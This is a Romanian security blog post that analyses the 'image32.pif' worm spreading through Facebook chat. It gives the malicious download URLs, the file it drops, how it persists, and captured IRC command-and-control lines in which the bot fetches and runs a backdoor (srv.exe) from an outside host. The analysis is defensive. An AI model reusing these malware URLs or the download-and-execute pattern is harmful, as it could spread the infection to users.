[Solutie] Virusul “image32.pif” se raspandeste pe Facebook!!!

Se raspandeste pe facebook un nou virus, propagat prin intermediul chat-ului.
Link-ul primit este urmatorul:

Dand click, victima este redirectionata spre http://www.lmageshare.com/images/image32.pif, fisierul pif fiind de tip executabil, infectand PC-ul in momentul rularii.

Detectia sa este una medie pe VirusTotal: 18 din 43 de Antivirusi.

Ce face acest malware?
Creeaza fisierul %AppData%\Ocxaxo.exe, ruleaza automat la pornirea Windows-ului, trimite mesaje prietenilor pe Facebook si incearca mai multe conexiuni spre cateva IP-uri si o conexiune de tip IRC, prin care descarca malware aditional in PC-ul victimei:

NICK n{US|XPa}dyrzbvn
USER dyrzbvn 0 0 :dyrzbvn
JOIN #ngr ngrbot
PRIVMSG #ngr :[d=”http://lmageshare.com/srv.exe” s=”124928 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\2.exe” – Download retries: 0

Acest fisier (srv.exe) este un Backdoor si are o detectie de doar 11 din 43 Antivirusi pe VirusTotal.com.

Lasă un răspuns

Completează mai jos detaliile despre tine sau dă clic pe un icon pentru autentificare:

Logo WordPress.com

Comentezi folosind contul tău WordPress.com. Dezautentificare / Schimbă )

Poză Twitter

Comentezi folosind contul tău Twitter. Dezautentificare / Schimbă )

Fotografie Facebook

Comentezi folosind contul tău Facebook. Dezautentificare / Schimbă )

Fotografie Google+

Comentezi folosind contul tău Google+. Dezautentificare / Schimbă )

Conectare la %s